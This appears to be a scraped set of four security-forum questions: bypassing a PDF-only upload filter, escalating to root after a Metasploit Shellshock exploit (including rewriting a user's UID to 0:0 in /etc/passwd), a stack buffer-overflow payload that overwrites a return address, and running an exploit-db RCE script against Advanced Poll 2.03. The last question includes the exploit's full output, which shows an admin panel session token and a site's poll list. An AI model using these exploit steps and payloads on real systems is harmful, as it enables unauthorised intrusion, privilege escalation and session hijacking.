how to exploit file upload functionality

I’m pentesting a website, where i’m testing an upload functionality and it only accepts pdf files and when we visit the url where the file gets uploaded it shows download prompt instead of any content. so i was able to bypass it and i upload an html file but when i visit the url it shows download prompt and didn’t execute the html in that domain but instead of that it executes after downloading the file, so how i can exploit this on the main domain. any ideas? and it also shows error when i upload the file with invalid extension. Error: scan status form scanner FAILED with error code 403 and origin message:FileDownloadFailException

Thanks

Get the privileges of root with the user with I do an exploit with Shellshock

I got the remote control of a linux machine with Shellshock attack in Kali Linux(attacker machine) to a TinyCore Linux (attacked machine), I used this module to attack the CGI vulnerability:

use exploit/multi/http/apache_mod_cgi_bash_env_exec

When I´m inside the machine I want to get the root privilege with my user, by default Shellshock doesn´t gives you the root user, but I want to transform my user to the root privileges, I´ve tried this with “sudo” controls but my shell meterpreter doesn´t recognize that command options, is there an alternative way of get the privileges of the root with the user that I obtain in Metasploit? Could be a working option change the user that I have(consulting getuid) to 0:0 in the /etc/passwd password fields in the file?

Buffer overflow exploit is leading to Segmentation Fault

#include<stdio.h> void secret(){   printf("entered secret function"); } void return_input() {   char array[60];   scanf("%s", array);   printf("%s\n",array); } int main() {   return_input();   return 0; } 

used this command

gcc overflowtest.c -o overflowtest -fno-stack-protector -m32

When I did a objdump, I found that the secret function is located at 0x0804848b and 68 bytes is allocated to array, next 4 bytes stores ebp of previous stack frame, and the next following 4 bytes the return address

I tried to replace the return address this way

python -c ‘print “a”*72 + “\x8b\x84\x04\x08″‘ | ./overflowtest

But it says aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa�� Segmentation fault (core dumped)

enter image description here enter image description here

How to correctly execute the following exploit

I already adjusted a couple of things and I could run it in a way:

https://www.exploit-db.com/exploits/3300

perl exploit.pl http://example.com ls 

However, I have a question: $ cmd means what I want to print from the RCE? because when I put “ls” it does not work and I do not understand then why they put RCE.

The version of Advanced Poll that I am using is 2.0.3

Edit: i add more information

After execution of exploit, the output is this:

Doing some pretty with http://example.com/db/admin1/index.php...  + generating session... <html> <head> <title>Advanced Poll 2.03</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- a {text-decoration: none} .td1 {  font-family: "MS Sans Serif"; font-size: 10pt} .td2 {  font-family: "MS Sans Serif"; font-size: 9pt} a:hover {  color: #FF0033; text-decoration: underline} --> </style> <script language="Javascript"> <!-- function del_entry(entry) {  if (window.confirm("Are you sure?")) {     window.location.href = "http://"+window.location.host+window.location.pathname+"?session=6c5d182100793704e5d56442c7bfcfc0&uid=1&action=delete&id="+entry+"&no_cache="+Math.random()  } } // --> </script> </head> <body bgcolor="#3A6EA5" link="#000000" vlink="#000000"> <table border="1" cellspacing="0" cellpadding="0" align="center" width="750">   <tr bgcolor="#C6C3C6" valign="top">     <td>       <table width="750" border="0" cellspacing="0" cellpadding="1" align="center">         <tr bgcolor="#400080">           <td height="20" class="td2" bgcolor="#000084"><b><font color="#FFFFFF">             &nbsp;Advanced Poll 2.03</font></b></td>           <td height="20" align="right" bgcolor="#000084"><img src="https://www.example.com/db/image/min.gif" width="16" height="14"><img src="https://www.example.com/db/image/max.gif" width="16" height="14">&nbsp;<a href="admin_logout.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1"><img src="https://www.example.com/db/image/cross.gif" width="16" height="14" border="0" alt="Logout"></a></td>         </tr>         <tr valign="top">           <td colspan="2">             <table border="0" cellspacing="0" cellpadding="1">               <tr>                 <td colspan="7"><img src="https://www.example.com/db/image/top_line.gif" width="745" height="3"></td>               </tr>               <tr>                 <td align="center" rowspan="2" width="5"><img src="https://www.example.com/db/image/v_line.gif" width="5" height="50"></td>                 <td align="center" width="120"><a href="index.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;action=show"><img src="https://www.example.com/db/image/index.gif" width="32" height="32" border="0" alt="Poll List"></a></td>                 <td align="center" width="131"><a href="index.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;action=new"><img src="https://www.example.com/db/image/new.gif" width="32" height="32" border="0" alt="Create a new poll"></a></td>                 <td align="center" width="153"><a href="admin_settings.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1"><img src="https://www.example.com/db/image/settings.gif" width="32" height="32" border="0" alt="General Settings"></a></td>                 <td align="center" width="121"><a href="admin_templates.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1"><img src="https://www.example.com/db/image/templates.gif" width="32" height="32" border="0" alt="Templates"></a></td>                 <td align="center" width="127"><a href="admin_password.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1"><img src="https://www.example.com/db/image/password.gif" width="32" height="32" border="0" alt="Change Password"></a></td>                 <td align="center" width="89"><a href="admin_help.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1"><img src="https://www.example.com/db/image/howto.gif" width="32" height="32" border="0" alt="Help"></a></td>               </tr>               <tr align="center" valign="top">                 <td width="120" class="td2">Poll List</td>                 <td width="131" class="td2">Create a new poll</td>                 <td width="153" class="td2">General Settings</td>                 <td width="121" class="td2">Templates</td>                 <td width="127" class="td2">Change Password</td>                 <td width="89" class="td2">Help</td>               </tr>               <tr align="left">                 <td colspan="7"><img src="https://www.example.com/db/image/top_line.gif" width="745" height="3"></td>               </tr>             </table>     <table border="0" cellspacing="0" cellpadding="4" align="center" width="100%">       <tr>         <td colspan="5" class="td1"><img src="https://www.example.com/db/image/h_line.gif" width="15" height="18">           Poll List <img src="https://www.example.com/db/image/h_line.gif" width="300" height="18"></td>         <td colspan="3" class="td2" align="right">Wednesday, 19 December 2018 12:32</td>       </tr>       <tr>         <td bgcolor="#9999CC">&nbsp;</td>         <td class="td2" bgcolor="#9999CC"><b>Question</b></td>         <td class="td2" bgcolor="#9999CC"><b>Poll ID</b></td>         <td class="td2" bgcolor="#9999CC"><b>Created</b></td>         <td class="td2" bgcolor="#9999CC"><b>Days</b></td>         <td class="td2" bgcolor="#9999CC"><b>Expiration</b></td>         <td class="td2" bgcolor="#9999CC"><b>Stats</b></td>         <td class="td2" bgcolor="#9999CC"><b>Action</b></td>       </tr>            <tr>        <td align="center" bgcolor="#E6E6E6"><img src="https://www.example.com/db/image/folder.gif" width="13" height="16" alt="enabled"></td>        <td class="td2" bgcolor="#E6E6E6"><a href="admin_edit.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=73" title="Edit this poll">¿Está de acuerdo con la construcción de un auditorio en el Parque Madero?</a></td>        <td class="td2" bgcolor="#CCCCCC">73</td>        <td class="td2" bgcolor="#E6E6E6">23-Jun-2015</td>        <td class="td2" bgcolor="#CCCCCC">1275</td>        <td class="td2" bgcolor="#E6E6E6"><font color="#0000FF">never</font></td>        <td class="td2" align="center" bgcolor="#CCCCCC"><a href="admin_stats.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=73"><img src="https://www.example.com/db/image/log.gif" width="16" height="16" border="0" alt="Stats"></a>&nbsp;&nbsp;           <a href="admin_comment.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=73"><img src="https://www.example.com/db/image/co_dis.gif" width="18" height="18" border="0" alt="Comments"></a>&nbsp;&nbsp;           <a href="admin_embed.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=73"><img src="https://www.example.com/db/image/text.gif" width="13" height="16" border="0" alt="Help"></a></td>        <td class="td2" bgcolor="#E6E6E6"><a href="javascript:del_entry(73)">delete</a></td>      </tr>      <tr>        <td align="center" bgcolor="#E6E6E6"><img src="https://www.example.com/db/image/folder.gif" width="13" height="16" alt="enabled"></td>        <td class="td2" bgcolor="#E6E6E6"><a href="admin_edit.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=71" title="Edit this poll">Si hoy fuean las elecciones ¿por quién votaría para alcalde de Hermosillo?</a></td>        <td class="td2" bgcolor="#CCCCCC">71</td>        <td class="td2" bgcolor="#E6E6E6">10-Feb-2015</td>        <td class="td2" bgcolor="#CCCCCC">1408</td>        <td class="td2" bgcolor="#E6E6E6"><font color="#FF6600">expired</font></td>        <td class="td2" align="center" bgcolor="#CCCCCC"><a href="admin_stats.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=71"><img src="https://www.example.com/db/image/log_off.gif" width="16" height="16" border="0" alt="Stats"></a>&nbsp;&nbsp;           <a href="admin_comment.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=71"><img src="https://www.example.com/db/image/co_dis.gif" width="18" height="18" border="0" alt="Comments"></a>&nbsp;&nbsp;           <a href="admin_embed.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=71"><img src="https://www.example.com/db/image/text.gif" width="13" height="16" border="0" alt="Help"></a></td>        <td class="td2" bgcolor="#E6E6E6"><a href="javascript:del_entry(71)">delete</a></td>      </tr>      <tr>        <td align="center" bgcolor="#E6E6E6"><img src="https://www.example.com/db/image/folder.gif" width="13" height="16" alt="enabled"></td>        <td class="td2" bgcolor="#E6E6E6"><a href="admin_edit.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=70" title="Edit this poll">Este 2015 hay elecciones en Sonora, locales y federales. ¿Va a ir a votar?</a></td>        <td class="td2" bgcolor="#CCCCCC">70</td>        <td class="td2" bgcolor="#E6E6E6">1-Jan-2015</td>        <td class="td2" bgcolor="#CCCCCC">1448</td>        <td class="td2" bgcolor="#E6E6E6"><font color="#FF6600">expired</font></td>        <td class="td2" align="center" bgcolor="#CCCCCC"><a href="admin_stats.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=70"><img src="https://www.example.com/db/image/log_off.gif" width="16" height="16" border="0" alt="Stats"></a>&nbsp;&nbsp;           <a href="admin_comment.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=70"><img src="https://www.example.com/db/image/co_dis.gif" width="18" height="18" border="0" alt="Comments"></a>&nbsp;&nbsp;           <a href="admin_embed.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=70"><img src="https://www.example.com/db/image/text.gif" width="13" height="16" border="0" alt="Help"></a></td>        <td class="td2" bgcolor="#E6E6E6"><a href="javascript:del_entry(70)">delete</a></td>      </tr>      <tr>        <td align="center" bgcolor="#E6E6E6"><img src="https://www.example.com/db/image/folder.gif" width="13" height="16" alt="enabled"></td>        <td class="td2" bgcolor="#E6E6E6"><a href="admin_edit.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=69" title="Edit this poll">En materia de seguridad ¿como cree usted que estamos?</a></td>        <td class="td2" bgcolor="#CCCCCC">69</td>        <td class="td2" bgcolor="#E6E6E6">12-Oct-2014</td>        <td class="td2" bgcolor="#CCCCCC">1528</td>        <td class="td2" bgcolor="#E6E6E6"><font color="#FF6600">expired</font></td>        <td class="td2" align="center" bgcolor="#CCCCCC"><a href="admin_stats.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=69"><img src="https://www.example.com/db/image/log.gif" width="16" height="16" border="0" alt="Stats"></a>&nbsp;&nbsp;           <a href="admin_comment.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=69"><img src="https://www.example.com/db/image/co_dis.gif" width="18" height="18" border="0" alt="Comments"></a>&nbsp;&nbsp;           <a href="admin_embed.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=69"><img src="https://www.example.com/db/image/text.gif" width="13" height="16" border="0" alt="Help"></a></td>        <td class="td2" bgcolor="#E6E6E6"><a href="javascript:del_entry(69)">delete</a></td>      </tr>      <tr>        <td align="center" bgcolor="#E6E6E6"><img src="https://www.example.com/db/image/folder.gif" width="13" height="16" alt="enabled"></td>        <td class="td2" bgcolor="#E6E6E6"><a href="admin_edit.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=67" title="Edit this poll">Si hubiera coalición de la izquierda, ¿quién le gustaría de candidat@ a Gobernador?</a></td>        <td class="td2" bgcolor="#CCCCCC">67</td>        <td class="td2" bgcolor="#E6E6E6">23-Sep-2014</td>        <td class="td2" bgcolor="#CCCCCC">1547</td>        <td class="td2" bgcolor="#E6E6E6"><font color="#FF6600">expired</font></td>        <td class="td2" align="center" bgcolor="#CCCCCC"><a href="admin_stats.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=67"><img src="https://www.example.com/db/image/log_off.gif" width="16" height="16" border="0" alt="Stats"></a>&nbsp;&nbsp;           <a href="admin_comment.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=67"><img src="https://www.example.com/db/image/co_dis.gif" width="18" height="18" border="0" alt="Comments"></a>&nbsp;&nbsp;           <a href="admin_embed.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=67"><img src="https://www.example.com/db/image/text.gif" width="13" height="16" border="0" alt="Help"></a></td>        <td class="td2" bgcolor="#E6E6E6"><a href="javascript:del_entry(67)">delete</a></td>      </tr>      <tr>        <td align="center" bgcolor="#E6E6E6"><img src="https://www.example.com/db/image/folder.gif" width="13" height="16" alt="enabled"></td>        <td class="td2" bgcolor="#E6E6E6"><a href="admin_edit.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=66" title="Edit this poll">Si las elecciones para Gobernador de Sonora fueran hoy, ¿por cuál partido votaría?</a></td>        <td class="td2" bgcolor="#CCCCCC">66</td>        <td class="td2" bgcolor="#E6E6E6">10-Sep-2014</td>        <td class="td2" bgcolor="#CCCCCC">1561</td>        <td class="td2" bgcolor="#E6E6E6"><font color="#FF6600">expired</font></td>        <td class="td2" align="center" bgcolor="#CCCCCC"><a href="admin_stats.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=66"><img src="https://www.example.com/db/image/log_off.gif" width="16" height="16" border="0" alt="Stats"></a>&nbsp;&nbsp;           <a href="admin_comment.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=66"><img src="https://www.example.com/db/image/co_dis.gif" width="18" height="18" border="0" alt="Comments"></a>&nbsp;&nbsp;           <a href="admin_embed.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=66"><img src="https://www.example.com/db/image/text.gif" width="13" height="16" border="0" alt="Help"></a></td>        <td class="td2" bgcolor="#E6E6E6"><a href="javascript:del_entry(66)">delete</a></td>      </tr>      <tr>        <td align="center" bgcolor="#E6E6E6"><img src="https://www.example.com/db/image/folder.gif" width="13" height="16" alt="enabled"></td>        <td class="td2" bgcolor="#E6E6E6"><a href="admin_edit.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=65" title="Edit this poll">¿Quién le gustaría de candidato del PRI para la alcaldía de Hermosillo?</a></td>        <td class="td2" bgcolor="#CCCCCC">65</td>        <td class="td2" bgcolor="#E6E6E6">30-Aug-2014</td>        <td class="td2" bgcolor="#CCCCCC">1571</td>        <td class="td2" bgcolor="#E6E6E6"><font color="#FF6600">expired</font></td>        <td class="td2" align="center" bgcolor="#CCCCCC"><a href="admin_stats.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=65"><img src="https://www.example.com/db/image/log_off.gif" width="16" height="16" border="0" alt="Stats"></a>&nbsp;&nbsp;           <a href="admin_comment.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=65"><img src="https://www.example.com/db/image/co_dis.gif" width="18" height="18" border="0" alt="Comments"></a>&nbsp;&nbsp;           <a href="admin_embed.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=65"><img src="https://www.example.com/db/image/text.gif" width="13" height="16" border="0" alt="Help"></a></td>        <td class="td2" bgcolor="#E6E6E6"><a href="javascript:del_entry(65)">delete</a></td>      </tr>      <tr>        <td align="center" bgcolor="#E6E6E6"><img src="https://www.example.com/db/image/folder.gif" width="13" height="16" alt="enabled"></td>        <td class="td2" bgcolor="#E6E6E6"><a href="admin_edit.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=64" title="Edit this poll">¿Qué cree usted haya sido la causa del derrame de químicos al río Sonora?</a></td>        <td class="td2" bgcolor="#CCCCCC">64</td>        <td class="td2" bgcolor="#E6E6E6">25-Aug-2014</td>        <td class="td2" bgcolor="#CCCCCC">1576</td>        <td class="td2" bgcolor="#E6E6E6"><font color="#FF6600">expired</font></td>        <td class="td2" align="center" bgcolor="#CCCCCC"><a href="admin_stats.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=64"><img src="https://www.example.com/db/image/log.gif" width="16" height="16" border="0" alt="Stats"></a>&nbsp;&nbsp;           <a href="admin_comment.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=64"><img src="https://www.example.com/db/image/co_dis.gif" width="18" height="18" border="0" alt="Comments"></a>&nbsp;&nbsp;           <a href="admin_embed.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=64"><img src="https://www.example.com/db/image/text.gif" width="13" height="16" border="0" alt="Help"></a></td>        <td class="td2" bgcolor="#E6E6E6"><a href="javascript:del_entry(64)">delete</a></td>      </tr>      <tr>        <td align="center" bgcolor="#E6E6E6"><img src="https://www.example.com/db/image/folder.gif" width="13" height="16" alt="enabled"></td>        <td class="td2" bgcolor="#E6E6E6"><a href="admin_edit.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=63" title="Edit this poll">Sobre le reforma energética, que opinión le parece más razonable:</a></td>        <td class="td2" bgcolor="#CCCCCC">63</td>        <td class="td2" bgcolor="#E6E6E6">11-Aug-2014</td>        <td class="td2" bgcolor="#CCCCCC">1590</td>        <td class="td2" bgcolor="#E6E6E6"><font color="#FF6600">expired</font></td>        <td class="td2" align="center" bgcolor="#CCCCCC"><a href="admin_stats.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=63"><img src="https://www.example.com/db/image/log_off.gif" width="16" height="16" border="0" alt="Stats"></a>&nbsp;&nbsp;           <a href="admin_comment.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=63"><img src="https://www.example.com/db/image/co_dis.gif" width="18" height="18" border="0" alt="Comments"></a>&nbsp;&nbsp;           <a href="admin_embed.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=63"><img src="https://www.example.com/db/image/text.gif" width="13" height="16" border="0" alt="Help"></a></td>        <td class="td2" bgcolor="#E6E6E6"><a href="javascript:del_entry(63)">delete</a></td>      </tr>      <tr>        <td align="center" bgcolor="#E6E6E6"><img src="https://www.example.com/db/image/folder.gif" width="13" height="16" alt="enabled"></td>        <td class="td2" bgcolor="#E6E6E6"><a href="admin_edit.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=62" title="Edit this poll">¿Qué cree usted que debe hacer Miguel Herrera con la Selección de Futbol?</a></td>        <td class="td2" bgcolor="#CCCCCC">62</td>        <td class="td2" bgcolor="#E6E6E6">4-Aug-2014</td>        <td class="td2" bgcolor="#CCCCCC">1597</td>        <td class="td2" bgcolor="#E6E6E6"><font color="#FF6600">expired</font></td>        <td class="td2" align="center" bgcolor="#CCCCCC"><a href="admin_stats.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=62"><img src="https://www.example.com/db/image/log.gif" width="16" height="16" border="0" alt="Stats"></a>&nbsp;&nbsp;           <a href="admin_comment.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=62"><img src="https://www.example.com/db/image/co_dis.gif" width="18" height="18" border="0" alt="Comments"></a>&nbsp;&nbsp;           <a href="admin_embed.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=62"><img src="https://www.example.com/db/image/text.gif" width="13" height="16" border="0" alt="Help"></a></td>        <td class="td2" bgcolor="#E6E6E6"><a href="javascript:del_entry(62)">delete</a></td>      </tr>      <tr>        <td align="center" bgcolor="#E6E6E6"><img src="https://www.example.com/db/image/folder.gif" width="13" height="16" alt="enabled"></td>        <td class="td2" bgcolor="#E6E6E6"><a href="admin_edit.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=61" title="Edit this poll">Si las elecciones para la alcaldía de Hermosillo fueran hoy ¿Por cuál partido votaría?</a></td>        <td class="td2" bgcolor="#CCCCCC">61</td>        <td class="td2" bgcolor="#E6E6E6">26-Jul-2014</td>        <td class="td2" bgcolor="#CCCCCC">1607</td>        <td class="td2" bgcolor="#E6E6E6"><font color="#FF6600">expired</font></td>        <td class="td2" align="center" bgcolor="#CCCCCC"><a href="admin_stats.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=61"><img src="https://www.example.com/db/image/log.gif" width="16" height="16" border="0" alt="Stats"></a>&nbsp;&nbsp;           <a href="admin_comment.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=61"><img src="https://www.example.com/db/image/co_dis.gif" width="18" height="18" border="0" alt="Comments"></a>&nbsp;&nbsp;           <a href="admin_embed.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=61"><img src="https://www.example.com/db/image/text.gif" width="13" height="16" border="0" alt="Help"></a></td>        <td class="td2" bgcolor="#E6E6E6"><a href="javascript:del_entry(61)">delete</a></td>      </tr>      <tr>        <td align="center" bgcolor="#E6E6E6"><img src="https://www.example.com/db/image/folder.gif" width="13" height="16" alt="enabled"></td>        <td class="td2" bgcolor="#E6E6E6"><a href="admin_edit.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=59" title="Edit this poll">¿Quién le gustaría que fuera el candidato(a) del PAN a la alcaldía de Hermosillo?</a></td>        <td class="td2" bgcolor="#CCCCCC">59</td>        <td class="td2" bgcolor="#E6E6E6">11-Jul-2014</td>        <td class="td2" bgcolor="#CCCCCC">1622</td>        <td class="td2" bgcolor="#E6E6E6"><font color="#FF6600">expired</font></td>        <td class="td2" align="center" bgcolor="#CCCCCC"><a href="admin_stats.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=59"><img src="https://www.example.com/db/image/log.gif" width="16" height="16" border="0" alt="Stats"></a>&nbsp;&nbsp;           <a href="admin_comment.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=59"><img src="https://www.example.com/db/image/co_dis.gif" width="18" height="18" border="0" alt="Comments"></a>&nbsp;&nbsp;           <a href="admin_embed.php?session=6c5d182100793704e5d56442c7bfcfc0&amp;uid=1&amp;poll_id=59"><img src="https://www.example.com/db/image/text.gif" width="13" height="16" border="0" alt="Help"></a></td>        <td class="td2" bgcolor="#E6E6E6"><a href="javascript:del_entry(59)">delete</a></td>      </tr>        <tr>         <td align="right"><img src="https://www.example.com/db/image/ip.gif" width="16" height="16"></td>         <td class="td2">user_1@localhost</td>         <td colspan="6" align="right" class="td2">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="index.php?session=6c5d182100793704e5d56442c7bfcfc0&uid=1&entry=12">Next page</a>&nbsp;<img src="https://www.example.com/db/image/next.gif" width="16" height="14"> </td>       </tr>     </table>           </td>         </tr>       </table>     </td>   </tr> </table> <br> <br> </body> </html>   session: 6c5d182100793704e5d56442c7bfcfc0 + injecting diplay_head.html template...   button: Save + executing... -- BOCE -- -- EOCE -- 

From what I see in the script, concatenate the “cmd” with what one sends you argument and should be printed at the end, between “–BOCE –” and “– EOCE–” (I think) but as you see , does not take anything